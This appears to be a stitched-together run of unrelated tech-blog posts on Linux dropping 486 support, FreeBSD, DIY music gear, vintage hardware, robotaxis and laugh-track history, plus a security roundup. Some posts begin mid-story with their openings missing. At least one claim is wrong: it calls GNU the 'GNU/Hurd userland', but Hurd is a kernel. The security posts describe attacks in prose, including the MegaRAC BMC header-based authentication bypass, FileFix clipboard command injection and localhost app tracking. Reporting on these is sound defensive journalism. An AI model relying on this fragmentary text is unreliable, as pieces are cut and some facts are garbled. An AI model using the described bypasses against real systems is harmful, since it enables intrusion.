If you’re a solo musician, you probably have lots of gear you’d like to control, but you don’t have enough hands. You can enlist your feet, but your gear might not have foot-suitable interfaces as standard. For situations like these, [Nerd Musician] created the OpenMIDIStomper.
The concept is simple enough—the hardy Hammond enclosure contains a bunch of foot switches and ports for external expression pedals. These are all read by an Arduino Pro Micro, which is responsible for turning these inputs into distinct MIDI outputs to control outboard gear or software. It handles this via MIDI over USB. The MIDI commands sent for each button can be configured via a webpage. Once you’ve defined all the messages you want to send, you can export your configuration from the webpage by cutting and pasting it into the Arduino IDE and flashing it to the device itself.
Some time ago, Linus Torvalds made a throwaway comment that sent ripples through the Linux world. Was it perhaps time to abandon support for the now-ancient Intel 486? Developers had already abandoned the 386 in 2012, and Torvalds openly mused if the time was right to make further cuts for the benefit of modernity.
It would take three long years, but that eventuality finally came to pass. As of version 6.15, the Linux kernel will no longer support chips running the 80486 architecture, along with a gaggle of early “586” chips as well. It’s all down to some housekeeping and precise technical changes that will make the new code inoperable with the machines of the past.
Why Won’t It Work Anymore?
The kernel has had a method to emulate the CMPXCH8B instruction for some time, but it will now be deprecated.
The big change is coming about thanks to a patch submitted by Ingo Molnar, a long time developer on the Linux kernel. The patch slashes support for older pre-Pentium CPUs, including the Intel 486 and a wide swathe of third-party chips that fell in between the 486 and Pentium generations when it came to low-level feature support.
Going forward, Molnar’s patch reconfigures the kernel to require CPUs have hardware support for the Time Stamp Counter (RDTSC) and CMPXCHG8B instructions. These became part of x86 when Intel introduced the very first Pentium processors to the market in the early 1990s. The Time Stamp Counter is relatively easy to understand—a simple 64-bit register that stores the number of cycles executed by the CPU since last reset. As for CMPXCHG8B, it’s used for comparing and exchanging eight bytes of data at a time. Earlier Intel CPUs got by with only the single-byte CMPXCHG instruction. The Linux kernel used to feature a piece of code to emulate CMPXCHG8B in order to ease interoperability with older chips that lacked the feature in hardware.
The changes remove around 15,000 lines of code. Deletions include code to emulate the CMPXCHG8B instruction for older processors that lacked the instruction, various emulated math routines, along with configuration code that configured the kernel properly for older lower-feature CPUs.
Basically, if you try to run Linux kernel 6.15 on a 486 going forward, it’s just not going to work. The kernel will make calls to instructions that the chip has never heard of, and everything will fall over. The same will be true for machines running various non-Pentium “586” chips, like the AMD 5×86 and Cyrix 5×86, as well as the AMD Elan. It’s likely even some later chips, like the Cyrix 6×86, might not work, given their questionable or non-existent support of the CMPXCHG8B instruction.
Why Now?
Molnar’s reasoning for the move was straightforward, as explained in the patch notes:
In the x86 architecture we have various complicated hardware emulation
facilities on x86-32 to support ancient 32-bit CPUs that very very few
people are using with modern kernels. This compatibility glue is sometimes
even causing problems that people spend time to resolve, which time could
be spent on other things.
Indeed, it follows on from earlier comments by Torvalds, who had noted how development was being held back by support for the ancient members of Intel’s x86 architecture. In particular, the Linux creator questioned whether modern kernels were even widely compatible with older 486 CPUs, given that various low-level features of the kernel had already begun to implement the use of instructions like RDTSC that weren’t present on pre-Pentium processors. “Our non-Pentium support is ACTIVELY BUGGY AND BROKEN right now,” Torvalds exclaimed in 2022. “This is not some theoretical issue, but very much a ‘look, ma, this has never been tested, and cannot actually work’ issue, that nobody has ever noticed because nobody really cares.”
Intel kept i486 chips in production for a good 18 years, with the last examples shipped out in September 2007. Credit: Konstantin Lanzet, CC BY-SA 3.0
Basically, the user base for modern kernels on old 486 and early “586” hardware was so small that Torvalds no longer believed anyone was even checking whether up-to-date Linux even worked on those platforms anymore. Thus, any further development effort to quash bugs and keep these platforms supported was unjustified.
It’s worth acknowledging that Intel made its last shipments of i486 chips on September 28, 2007. That’s perhaps more recent than you might think for a chip that was launched in 1989. However, these chips weren’t for mainstream use. Beyond the early 1990s, the 486 was dead for desktop users, with an IBM spokesperson calling the 486 an “ancient chip” and a “dinosaur” in 1996. Intel’s production continued on beyond that point almost solely for the benefit of military, medical, industrial and other embedded users.
Third-party chips like the AMD Elan will no longer be usable, either. Credit: Phiarc, CC-BY-SA 4.0
If there was a large and vocal community calling for ongoing support for these older processors, the kernel development team might have seen things differently. However, in the month or so that the kernel patch has been public, no such furore has erupted. Indeed, there’s nothing stopping these older machines still running Linux—they just won’t be able to run the most up-to-date kernels. That’s not such a big deal.
While there are usually security implications around running outdated operating systems, the simple fact is that few to no important 486 systems should really be connected to the Internet anyway. They lack the performance to even load things like modern websites, and have little spare overhead to run antiviral software or firewalls on top of whatever software is required for their main duties. Operators of such machines won’t be missing much by being stuck on earlier revisions of the kernel.
Ultimately, it’s good to see Linux developers continuing to prune the chaff and improve the kernel for the future. It’s perhaps sad to say goodbye to the 486 and the gaggle of weird almost-Pentiums from other manufacturers, but if we’re honest, few to none were running the most recent Linux kernel anyway. Onwards and upwards!
People have been talking about switching from Windows to Linux since the 1990s, but in the world of open-source operating systems, there is much more variety than just the hundreds of flavors of Linux-based operating systems today. Take FreeBSD, for example. In a recent [GNULectures] video, we get to see a user’s attempt to switch from desktop Linux to desktop FreeBSD.
The interesting thing here is that both are similar and yet very different, mainly owing to their very different histories, with FreeBSD being a direct derivative of the original UNIX and its BSD derivative. One of the most significant differences is probably that Linux is just a kernel, with (usually) the GNU/Hurd userland glued on top of it to create GNU/Linux. GNU and BSD userland are similar, and yet different, with varying levels of POSIX support. This effectively means that FreeBSD is a singular OS with rather nice documentation (the FreeBSD handbook).
The basic summary here is that FreeBSD is rather impressive and easy to set up for a desktop, especially if you use a customized version like GhostBSD. Despite Libreboot, laptop power management, OSB NVENC, printer, and WiFi issues, it was noted that none of these are uncommon with GNU/Linux either. Having a single package manager (pkg) for all of FreeBSD (and derivatives) simplifies things a lot. The bhyve hypervisor makes running VMs a snap. A robust ZFS filesystem is also a big plus.
What counts against desktop FreeBSD in the end is a less refined experience in some areas, despite FreeBSD being able to run Linux applications courtesy of binary compatibility. With some developer love and care, FreeBSD might make for a nice desktop alternative to GNU/Linux before long, one that could be tempting even for the die-hard Windows holdouts among us.
The construction is simple enough, attractive in its own way, with a rugged junk-assembly sort of style. The video starts out by demonstrating the use of a piezo element hooked up as a simple contact microphone, before developing it into something more eclectic.
The basic concept: Mount the piezo element to a metal box fitted with a variety of oddball implements. What kind of implements? Spiralled copper wires, a spring, and parts of a whisk. When struck, plucked, or twanged, they conduct vibrations through the box, the microphone picks them up, and the box passes the sound on to other audio equipment.
It might seem frivolous, but it’s got some real value for avant-garde musical experimentation. In particular, if you’re looking for weird signals to feed into your effects rack or modular synth setup, this is a great place to start.
Old hardware tends to get less support as the years go by, from both manufacturers and the open-source community alike. And yet, every now and then, we hear about fresh attention for an ancient device. Consider the ancient SoundBlaster sound card that first hit the market 31 years ago. [Mark] noticed that a recent update squashed a new bug on an old piece of gear.
Jump over to the Linux kernel archive, and you’ll find a pull request for v6.16-rc3 from [Takashi Iwai]. The update featured fixes for a number of sound devices, but one stands out amongst the rest. It’s the SoundBlaster AWE32 ISA sound card, with [Iwai] noting “we still got a bug report after 25 years.” The bug in question appears to have been reported in 2023 by a user running Fedora 39 on a 120 MHz Pentium-based machine.
The fixes themselves are not particularly interesting. They merely concern minutiae about the DMA modes used with the old hardware. The new updates ensure that DMA modes cannot be changed while the AWE32 is playing a PCM audio stream, and that DMA setups are disabled when changing modes. This helps avoid system lockups and/or ugly noises emanating from the output of the soundcard.
It’s incredibly unlikely this update will affect you, unless you’re one of a handful of users still using an ISA soundcard in 2025. Still, if you are — and good on you — you’ll be pleased someone still cares about your user experience. Meanwhile, if you’re aware of any other obscure old-school driver updates going on out there, don’t hesitate to let us know on the tips line. Want to relive your ISA card’s glory days? Plug it into USB.
Earlier this year, I was required to move my server to a different datacenter. The tech that helped handle the logistics suggested I assign one of my public IPs to the server’s Baseboard Management Controller (BMC) port, so I could access the controls there if something went sideways. I passed on the offer, and not only because IPv4 addresses are a scarce commodity these days. No, I’ve never trusted a server’s built-in BMC. For reasons like this MegaOWN of MegaRAC, courtesy of a CVSS 10.0 CVE, under active exploitation in the wild.
This vulnerability was discovered by Eclypsium back in March and it’s a pretty simple authentication bypass, exploited by setting an X-Server-Addr header to the device IP address and adding an extra colon symbol to that string. Send this along inside an HTTP request, and it’s automatically allowed without authentication. This was assigned CVE-2024-54085, and for servers with the BMC accessible from the Internet, it scores that scorching 10.0 CVSS.
We’re talking about this now, because CISA has added this CVE to the official list of vulnerabilities known to be exploited in the wild. And it’s hardly surprising, as this is a near-trivial vulnerability to exploit, and it’s not particularly challenging to find web interfaces for the MegaRAC devices using tools like Shodan and others.
There’s a particularly ugly scenario that’s likely to play out here: Embedded malware. This vulnerability could be chained with others, and the OS running on the BMC itself could be permanently modified. It would be very difficult to disinfect and then verify the integrity of one of these embedded systems, short of physically removing and replacing the flash chip. And malware running from this very advantageous position very nearly have the keys to the kingdom, particularly if the architecture connects the BMC controller over the PCIe bus, which includes Direct Memory Access.
This brings us to the really bad news. These devices are everywhere. The list of hardware that ships with the MegaRAC Redfish UI includes select units from “AMD, Ampere Computing, ASRock, ARM, Fujitsu, Gigabyte, Huawei, Nvidia, Supermicro, and Qualcomm”. Some of these vendors have released patches. But at this point, any of the vulnerable devices on the Internet, still unpatched, should probably be considered compromised.
Patching Isn’t Enough
To drive the point home that a compromised embedded device is hard to fully disinfect, we have the report from [Max van der Horst] at Disclosing.observer, detailing backdoors discovered in verious devices, even after the patch was applied.
These tend to hide in PHP code with innocent-looking filenames, or in an Nginx config. This report covers a scan of Citrix hosts, where 2,491 backdoors were discovered, which is far more than had been previously identified. Installing the patch doesn’t always mitigate the compromise.
VSCode
Many of us have found VSCode to be an outstanding IDE, and the fact that it’s Open Source and cross-platform makes it perfect for programmers around the world. Except for the telemetry, which is built into the official Microsoft builds. It’s Open Source, so the natural reaction from the community is to rebuild the source, and offer builds that don’t have telemetry included. We have fun names like VSCodium and Cursor for these rebuilds. Kudos to Microsoft for making VSCode Open Source so this is possible.
There is, however, a catch, in the form of the extension marketplace. Only official VSCode builds are allowed to pull extensions from the marketplace. As would be expected, the community has risen to the challenge, and one of the marketplace alternatives is Open VSX. And this week, we have the story of how a bug in the Open VSX publishing code could have been a really big problem.
When developers are happy with their work, and are ready to cut a release, how does that actually work? Basically every project uses some degree of automation to make releases happen. For highly automated projects, it’s just a single manual action — a kick-off of a Continuous Integration (CI) run — that builds and publishes the new release. Open VSX supports this sort of approach, and in fact runs a nightly GitHub Action to iterate through the list of extensions, and pull any updates that are advertised.
VS Code extensions are Node.js projects, and are built using npm. So the workflow clones the repository, and runs npm install to generate the installable packages. Running npm install does carry the danger that arbitrary code runs inside the build scripts. How bad would it be for malicious code to run inside this nightly update action, on the Open VSX GitHub repository?
A super-admin token was available as an environment variable inside this GitHub Action, that if exfiltrated would allow complete takeover of the Open VSX repository and unfettered access to the software contained therein. There’s no evidence that this vulnerability was found or exploited, and OpenVSX and Koi Security worked together to mitigate it, with the patch landing about a month and a half after first disclosure.
FileFix
There’s a new social engineering attack on the web, FileFix. It’s a very simple, nearly dumb idea. By that I mean, a reader of this column would almost certainly never fall for it, because FileFix asks the user to do something really unusual. You get an email or land on a bad website, and it appears present a document for you. To access this doc, just follow the steps. Copy this path, open your File Explorer, and paste the path. Easy! The website even gives you a button to click to launch file explorer.
That button actually launches a file upload dialog, but that’s not even the clever part. This attack takes advantage of two quirks. The first is that Javascript can inject arbitrary strings into the paste buffer, and the second is that system commands can be run from the Windows Explorer bar. So yes, copy that string, and paste it into the bar, and it can execute a command. So while it’s a dumb attack, and asks the user to do something very weird, it’s also a very clever intersection between a couple of quirky behaviors, and users will absolutely fall for this.
eMMC Data Extraction
The embedded MultiMediaCard (eMMC) is a popular option for flash storage on embedded devices. And Zero Day Initiative has a fascinating look into what it takes to pull data from an eMMC chip in-situ. An 8-leg EEPROM is pretty simple to desolder or probe, but the ball grid array of an eMMC is beyond the reach of mere mortals. If you’re soldering skills aren’t up to the task, there’s still hope to get that data off. The only connections needed are power, reference voltage, clock, a command line, and the data lines. If you can figure out connection points for all of those, you can probably power the chip and talk to it.
One challenge is how to keep the rest of the system from booting up and getting chatty. There’s a clever idea, to look for a reset pin on the MCU, and just hold that active while you work, keeping the MCU in a reset, and quiet, state. Another fun idea is to just remove the system’s oscillator, as the MCU may depend on it to boot and do anything.
Bits and Bytes
What would you do with 40,000 alarm clocks? That’s the question unintentionally faced by [Ian Kilgore], when he discovered that the loftie wireless alarm clock works over unsecured MQTT. On the plus side, he got Home Automation integration working.
What does it look like, when an attack gets launched against a big cloud vendor? The folks at Cloud-IAM pull the curtain back just a bit, and talk about an issue that almost allowed an enumeration attack to become an effective DDoS. They found the attack and patched their code, which is when it turned into a DDoS race, that Cloud-IAM managed to win.
The Wire secure communication platform recently got a good hard look from the Almond security team. And while the platform seems to have passed with good grades, there are a few quirks around file sharing that you might want to keep in mind. For instance, when a shared file is deleted, the backing files aren’t deleted, just the encryption keys. And the UUID on those files serves as the authentication mechanism, with no additional authentication needed. None of the issues found rise to the level of vulnerabilities, but it’s good to know.
To paraphrase an old joke: How do you know if someone is a Rust developer? Don’t worry, they’ll tell you. There is a move to put Rust everywhere, even in the Linux kernel. Not going fast enough for you? Then check out Asterinas — an effort to create a Linux-compatible kernel totally in Rust.
The goal is to improve memory safety and, to that end, the project describes what they call a “framekernel.” Historically kernels have been either monolithic, all in one piece, or employ a microkernel architecture where only bits and pieces load.
A framekernel is similar to a microkernel, but some services are not allowed to use “unsafe” Rust. This minimizes the amount of code that — in theory — could crash memory safety. If you want to know more, there is impressive documentation. You can find the code on GitHub.
Will it work? It is certainly possible. Is it worth it? Time will tell. Our experience is that no matter how many safeguards you put on code, there’s no cure-all that prevents bad programming. Of course, to take the contrary argument, seat belts don’t stop all traffic fatalities, but you could just choose not to have accidents. So we do have seat belts. If Rust can prevent some mistakes or malicious intent, maybe it’s worth it even if it isn’t perfect.
I ran into an old episode of Hogan’s Heroes the other day that stuck me as odd. It didn’t have a laugh track. Ironically, the show was one where two pilots were shown, one with and one without a laugh track. The resulting data ensured future shows would have fake laughter. This wasn’t the pilot, though, so I think it was just an error on the part of the streaming service.
However, it was very odd. Many of the jokes didn’t come off as funny without the laugh track. Many of them came off as cruel. That got me to thinking about how they had to put laughter in these shows to begin with. I had my suspicions, but was I way off!
Well, to be honest, my suspicions were well-founded if you go back far enough. Bing Crosby was tired of running two live broadcasts, one for each coast, so he invested in tape recording, using German recorders Jack Mullin had brought back after World War II. Apparently, one week, Crosby’s guest was a comic named Bob Burns. He told some off-color stories, and the audience was howling. Of course, none of that would make it on the air in those days. But they saved the recording.
A few weeks later, either a bit of the show wasn’t as funny or the audience was in a bad mood. So they spliced in some of the laughs from the Burns performance. You could guess that would happen, and that’s the apparent birth of the laugh track. But that method didn’t last long before someone — Charley Douglass — came up with something better.
Sweetening
The problem with a studio audience is that they might not laugh at the right times. Or at all. Or they might laugh too much, too loudly, or too long. Charley Douglass developed techniques for sweetening an audio track — adding laughter, or desweetening by muting or cutting live laughter. At first, this was laborious, but Douglass had a plan.
He built a prototype machine that was a 28-inch wooden wheel with tape glued to its perimeter. The tape had laughter recordings and a mechanical detent system to control how much it played back.
Douglass decided to leave CBS, but the prototype belonged to them. However, the machine didn’t last very long without his attention. In 1953, he built his own derivative version and populated it with laughter from the Red Skelton Show, where Red did pantomime, and, thus, there was no audio but the laughter and applause.
Do You Really Need It?
There is a lot of debate regarding fake laughter. On the one hand, it does seem to help. On the other hand, shouldn’t people just — you know — laugh when something’s funny?
There was concern, for example, that the Munsters would be scary without a laugh track. Like I mentioned earlier, some of the gags on Hogan’s Heroes are fine with laughter, but seem mean-spirited without.
Consider the Big Bang theory. If you watch a clip (below) with no laugh track, you’ll notice two things. First, it does seem a bit mean (as a commenter said: “…like a bunch of people who really hate each other…” The other thing you’ll notice is that they pause for the laugh track insertion, which, when there is no laughter, comes off as really weird.
Laugh Monopoly
Laugh tracks became very common with most single-camera shows. These were hard to do in front of an audience because they weren’t filmed in sequence. Even so, some directors didn’t approve of “mechanical tricks” and refused to use fake laughter.
Even multiple-camera shows would sometimes want to augment a weak audience reaction or even just replace laughter to make editing less noticeable. Soon, producers realized that they could do away with the audience and just use canned laughter. Douglass was essentially the only game in town, at least in the United States.
The Douglass device was used on all the shows from the 1950s through the 1970s. Andy Griffith? Yep. Betwitched? Sure. The Brady Bunch? Of course. Even the Munster had Douglass or one of his family members creating their laugh tracks.
One reason he stayed a monopoly is that he was extremely secretive about how he did his work. In 1960, he formed Northridge Electronics out of a garage. When called upon, he’d wheel his invention into a studio’s editing room and add laughs for them. No one was allowed to watch.
You can see the original “laff box” in the videos below.
The device was securely locked, but inside, we now know that the machine had 32 tape loops, each with ten laugh tracks. Typewriter-like keys allowed you to select various laughs and control their duration and intensity,
In the background, there was always a titter track of people mildly laughing that could be made more or less prominent. There were also some other sound effects like clapping or people moving in seats.
Building a laugh track involved mixing samples from different tracks and modulating their amplitude. You can imagine it was like playing a musical instrument that emits laughter.
Before you tell us, yes, there seems to be some kind of modern interface board on the top in the second video. No, we don’t know what it is for, but we’re sure it isn’t part of the original machine.
Of course, all things end. As technology got better and tastes changed, some companies — notably animation companies — made their own laugh tracks. One of Douglass’ protégés started a company, Sound One, that used better technology to create laughter, including stereo recordings and cassette tapes.
Today, laugh tracks are not everywhere, but you can still find them and, of course, they are prevalent in reruns. The next time you hear one, you’ll know the history behind that giggle.
During Apple’s late-90s struggles with profitability, it made a few overtures toward licensing its software to other computer manufacturers, while at the same time trying to modernize its operating system, which was threatening to slip behind Windows. While Apple eventually scrapped their licensing plans, an interesting product of the situation was Rhapsody OS. Although Apple was still building PowerPC computers, Rhapsody also had compatibility with Intel processors, which [Omores] put to good use by running it on a relatively modern i7-3770 CPU.
[Omores] selected a Gigabyte GA-Z68A-D3-B3 motherboard because it supports IDE emulation for SATA drives, a protocol which Rhapsody requires. The operating system installer needs to run from two floppy disks, one for boot and one for drivers. The Gigabyte motherboard doesn’t support a floppy disk drive, so [Omores] used an older Asus P5E motherboard with a floppy drive to install Rhapsody onto an SSD, then transferred the SSD to the Gigabyte board. The installation initially had a kernel panic during installation caused by finding too much memory available. Limiting the physical RAM available to the OS by setting the maxmem value solved this issue.
After this, the graphical installation went fairly smoothly. A serial mouse was essential here, since Rhapsody doesn’t support USB. It detected the video card immediately, and eventually worked with one of [Omores]’s ethernet cards. [Omores] also took a brief look at Rhapsody’s interface. By default, there were no graphical programs for web browsing, decompressing files, or installing programs, so some command line work was necessary to install applications. Of course, the highlight of the video was the installation of a Doom port (RhapsoDoom).
Are robotaxis poised to be the Next Big Thing in North America? It seems so, at least according to Goldman Sachs, which issued a report this week stating that robotaxis have officially entered the commercialization phase of the hype cycle. That assessment appears to be based on an analysis of the total ride-sharing market, which encompasses services that are currently almost 100% reliant on meat-based drivers, such as Lyft and Uber, and is valued at $58 billion. Autonomous ride-hailing services like Waymo, which has a fleet of 1,500 robotaxis operating in several cities across the US, are included in that market but account for less than 1% of the total right now. But, Goldman projects that the market will burgeon to over $336 billion in the next five years, driven in large part by “hyperscaling” of autonomous vehicles.
We suspect the upcoming launch of Tesla’s robotaxis in Austin, Texas, accounts for some of this enthusiasm for the near-term, but we have our doubts that a market based on such new and complex technologies can scale that quickly. A little back-of-the-envelope math suggests that the robotaxi fleet will need to grow to about 9,000 cars in the next five years, assuming the same proportion of autonomous cars in the total ride-sharing fleet as exists today. A look inside the Waymo robotaxi plant outside of Phoenix reveals that it can currently only convert “several” Jaguar electric SUVs per day, meaning they’ve got a lot of work to do to meet the needed numbers. Other manufacturers will no doubt pitch in, especially Tesla, and factory automation always seems to pull off miracles under difficult circumstances, but it still seems like a stretch to think there’ll be that many robotaxis on the road in only five years. Also, it currently costs more to hail a robotaxi than an Uber or Lyft, and we just don’t see why anyone would prefer to call a robotaxi, unless it’s for the novelty of the experience.
On the other hand, if the autonomous ride-sharing market does experience explosive growth, there could be knock-on benefits even for Luddite naysayers such as we. A report, again from Goldman Sachs — hey, they probably have a lot of skin in the game — predicts that auto insurance rates could fall by 50% as more autonomous cars hit the streets. This is based on markedly lower liability for self-driving cars, which have 92% fewer bodily injury claims and 88% lower property damage claims than human-driven cars. Granted, those numbers have to be based on a very limited population, and we guarantee that self-drivers will find new and interesting ways to screw up on the road. But if our insurance rates fall even a little because of self-driving cars, we’ll take it as a win.
Speaking of robotics, if you want to see just how far we’ve come in terms of robot dexterity, look no further than the package-sorting abilities of Figure’s Helix robot. The video in the article is an hour long, but you don’t need to watch more than a few minutes to be thoroughly impressed. The robot is standing at a sorting table with an infeed conveyor loaded with just about the worst parcels possible, a mix of soft, floppy, poly-bagged packages, flat envelopes, and traditional boxes. The robot was tasked with placing the parcels on an outfeed conveyor, barcode-side down, and with proper separation between packages. It also treats the soft poly-bag parcels to a bit of extra attention, pressing them down a bit to flatten them before flicking them onto the belt. Actually, it’s that flicking action that seems the most human, since it’s accompanied by a head-swivel to the infeed belt to select its next package. Assuming this is legit autonomous and not covertly teleoperated, which we have no reason to believe, the manual dexterity on display here is next-level; we’re especially charmed by the carefree little package flip about a minute in. The way it handles mistakenly grabbing two packages at once is pretty amazing, too.
And finally, our friend Leo Fernekes dropped a new video that’ll hit close to home for a lot of you out there. Leo is a bit of a techno-hoarder, you see, and with the need to make some room at home and maintain his domestic tranquility, he had to tackle the difficult process of getting rid of old projects, some of which date back 40 or more years. Aside from the fun look through his back-catalog of projects, the video is also an examination of the emotional attachments we hackers tend to develop to our projects. We touched on that a bit in our article on tech anthropomorphization, but we see how going through these projects is not only a snapshot of the state of the technology available at the time, but also a slice of life. Each of the projects is not just a collection of parts, they’re collections of memories of where Leo was in life at the time. Sometimes it’s hard to let go of things that are so strongly symbolic of a time that’s never coming back, and we applaud Leo for having the strength to pitch that stuff. Although seeing a clock filled with 80s TTL chips and a vintage 8085 microprocessor go into the bin was a little tough to watch.
Facebook and Yandex have been caught performing user-hostile tracking. This sort of makes today just another Friday, but this is a bit special. This time, it’s Local Mess. OK, it’s an attack with a dorky name, but very clever. The short explanation is that web sites can open connections to localhost. And on Android, apps can be listening to those ports, allowing web pages to talk to apps.
That may not sound too terrible, but there’s a couple things to be aware of. First, Android (and iOS) apps are sandboxed — intentionally making it difficult for one app to talk to another, except in ways approved by the OS maker. The browser is similarly sandboxed away from the apps. This is a security boundary, but it is especially an important security boundary when the user is in incognito mode.
The tracking Pixel is important to explain here. This is a snippet of code, that puts an invisible image on a website, and as a result allows the tracker to run JavaScript in your browser in the context of that site. Facebook is famous for this, but is not the only advertising service that tracks users in this way. If you’ve searched for an item on one site, and then suddenly been bombarded with ads for that item on other sites, you’ve been tracked by the pixel.
This is most useful when a user is logged in, but on a mobile device, the user is much more likely to be logged in on an app and not the browser. The constant pressure for more and better data led to a novel and completely unethical solution. On Android, applications with permission to access the Internet can listen on localhost (127.0.0.1) on unprivileged ports, those above 1024.
Facebook abused this quirk by opening a WebRTC connection to localhost, to one of the ports the Facebook app was listening on. This triggers an SDP connection to localhost, which starts by sending a STUN packet, a UDP tool for NAT traversal. Packed into that STUN packet is the contents of a Facebook Cookie, which the Facebook app happily forwards up to Facebook. The browser also sends that cookie to Facebook when loading the pixel, and boom Facebook knows what website you’re on. Even if you’re not logged in, or incognito mode is turned on.
Yandex has been doing something similar since 2017, though with a different, simpler mechanism. Rather than call localhost directly, Yandex just sets aside yandexmetrica.com for this purpose, with the domain pointing to 127.0.0.1. This was just used to open an HTTP connection to the native Yandex apps, which passed the data up to Yandex over HTTPS. Meta apps were first seen using this trick in September 2024, though it’s very possible it was in use earlier.
Both companies have ceased since this report was released. What’s interesting is that this is a flagrant violation of GDPR and CCPA, and will likely lead to record-setting fines, at least for Facebook.
What’s your Number?
An experiment in which Google sites still worked with JavaScript disabled led to a fun discovery about how to sidestep rate limiting and find any Google user’s phone number. Google has deployed defensive solutions to prevent attackers from abusing endpoints like accounts.google.com/signing/usernamerecovery. That particular endpoint still works without JS, but also still detects more than a few attempts, and throws the captcha at anyone trying to brute-force it.
This is intended to work by JS in your browser performing a minor proof-of-work calculation, and then sends in a bgRequest token. On the no-JavaScript version of the site, that field instead was set to js_disabled. What happens if you simply take the valid token, and stuff it into your request? Profit! This unintended combination bypassed rate-limiting, and means a phone number was trivially discoverable from just a user’s first and last names. It was mitigated in just over a month, and [brutecat] earned a nice $5000 for the effort.
It’s not a trivial attack, and just forcing a remote server to open an SMB connection to a location the attack controls is an impressive vulnerability. The trick is a hostname that includes the target name and a base64 encoded CREDENTIAL_TARGET_INFORMATIONW all inside the attacker’s valid hostname. This confuses the remote, triggering it to act as if it’s authenticating to itself. Forcing a Kerberos authentication instead of NTLM completes the attacker magic, though there’s one more mystery at play.
When the attack starts, the attacker has a low-privileged computer account. When it finishes, the access is at SYSTEM level on the target. It’s unclear exactly why, though the researchers theorize that a mitigation intended to prevent almost exactly this privilege escalation is the cause.
X And the Juicebox
X has rolled out a new end to end encrypted chat solution, XChat. It’s intended to be a significant upgrade from the previous iteration, but not everyone is impressed. Truly end to end encryption is extremely hard to roll out at scale, among other reasons, because users are terrible at managing cryptography keys. The solution generally is for the service provider to store the keys instead. But what is the point of end-to-end encryption when the company holds the keys? While there isn’t a complete solution for this problem, There is a very clever mitigation: Juicebox.
Juicebox lets users set a short PIN, uses that in the generation of the actual encryption key, breaks the key into parts to be held at different servers, and then promise to erase the key if the PIN is guessed incorrectly too many times. This is the solution X is using. Sounds great, right? There are two gotchas in that description. The first is the different servers: That’s only useful if those servers aren’t all run by the same company. And second, the promise to delete the key. That’s not cryptographically guaranteed.
There is some indication that X is running a pair of Hardware Security Modules (HSMs) as part of their Juicebox system, which significantly helps with both of those issues, but there just isn’t enough transparency into the system yet. For the time being, the consensus is that Signal is still the safest platform to use.
Bits and Bytes
We’re a bit light on Bits this week, so you’ll have to get by with the report that Secure Boot attacks are publicly available. It’s a firmware update tool from DT Research, and is signed by Microsoft’s UEFI keys. This tool contains a vulnerability that allows breaking out of it’s intended use, and running arbitrary code. This one has been patched, but there’s a second, similar problem in a Microsoft-signed IGEL kernel image, that allows running an arbitrary rootfs. This isn’t particularly a problem for us regular users, but the constant stream of compromised, signed UEFI boot images doesn’t bode well for the long term success of Secure Boot as a security measure.
You might wonder why you’d repair a calculator when you can pick up a new one for a buck. [Tech Tangents] though has some old Sony calculators that used Nixie tubes, including one from the 1960s. Two of his recent finds of Sony SOBAX calculators need repair, and we think you’ll agree that restoring these historical calculators is well worth the effort. Does your calculator have a carrying handle? We didn’t think so. Check out the video below to see what that looks like.
The devices don’t even use modern ICs. Inside, there are modules of discrete parts encapsulated in epoxy. There isn’t even RAM inside, but there is a delay line memory, although it is marked “unrepairable.”
There is some interesting history about this line of calculators, and the video covers that. Apparently, the whole line of early calculators grew out of an engineer’s personal project to use transistors that were scrapped because they didn’t meet the specifications for whatever application that used them.
The handle isn’t just cosmetic. You could get an external battery pack if you really wanted a very heavy — about 14 pounds (6.3 kilograms) — and large portable calculator. We are sure the $1,000 retail price tag didn’t include a battery.
These machines are beautiful, and it is fun to see the construction of these old devices. You might think our favorite calculator is based on Star Trek. As much as we do like that, we still think the HP-41C might be the best calculator ever made, even in emulation.
When purchasing high-end gear, it’s not uncommon for manufacturers to include a little swag in the box. It makes the customer feel a bit better about the amount of money that just left their wallet, and it’s a great way for the manufacturer to build some brand loyalty and perhaps even get their logo out into the public. What’s not expected, though, is for the swag to be the only thing in the box. That’s what a Redditor reported after a recent purchase of an Nvidia GeForce RTX 5090, a GPU that lists for $1,999 but is so in-demand that it’s unobtainium at anything south of $2,600. When the factory-sealed box was opened, the Redditor found it stuffed with two cheap backpacks instead of the card. To add insult to injury, the bags didn’t even sport an Nvidia logo.
The purchase was made at a Micro Center in Santa Clara, California, and an investigation by the store revealed 31 other cards had been similarly tampered with, although no word on what they contained in lieu of the intended hardware. The fact that the boxes were apparently sealed at the factory with authentic anti-tamper tape seems to suggest the substitutions happened very high in the supply chain, possibly even at the end of the assembly line. It’s a little hard to imagine how a factory worker was able to smuggle 32 high-end graphics cards out of the building, so maybe the crime occurred lower down in the supply chain by someone with access to factory seals. Either way, the thief or thieves ended up with almost $100,000 worth of hardware, and with that kind of incentive, this kind of thing will likely happen again. Keep your wits about you when you make a purchase like this.
Good news, everyone — it seems the Milky Way galaxy isn’t necessarily going to collide with the Andromeda galaxy after all. That the two galactic neighbors would one day merge into a single chaotic gemisch of stars was once taken as canon, but new data from Hubble and Gaia reduce the odds of a collision to fifty-fifty over the next ten billion years. What changed? Apparently, it has to do with some of our other neighbors in this little corner of the universe, like the Large Magellanic Cloud and the M33 satellite galaxy. It seems that early calculations didn’t take the mass of these objects into account, so when you add them into the equation, it’s a toss-up as to what’s going to happen. Not that it’s going to matter much to Earth, which by then will be just a tiny blob of plasma orbiting within old Sol, hideously bloated to red giant status and well on its way to retirement as a white dwarf. So there’s that.
A few weeks ago, we mentioned an epic humanoid robot freakout that was making the rounds on social media. The bot, a Unitree H1, started flailing its arms uncontrollably while hanging from a test stand, seriously endangering the engineers nearby. The line of the meltdown was that this was some sort of AI tantrum, and that the robot was simply lashing out at the injustices its creators no doubt inflicted upon it. Unsurprisingly, that’s not even close to what happened, and the root cause has a much simpler engineering explanation. According to unnamed robotics experts, the problem stemmed from the tether used to suspend the robot from the test frame. The robot’s sensor mistook the force of the tether as constant acceleration in the -Z axis. In other words, the robot thought it was falling, which caused its balance algorithms to try to compensate by moving its arms and legs, which caused more force on the tether. That led to a positive feedback loop and the freakout we witnessed. It seems plausible, and it’s certainly a simpler explanation than a sudden emergent AI attitude problem.
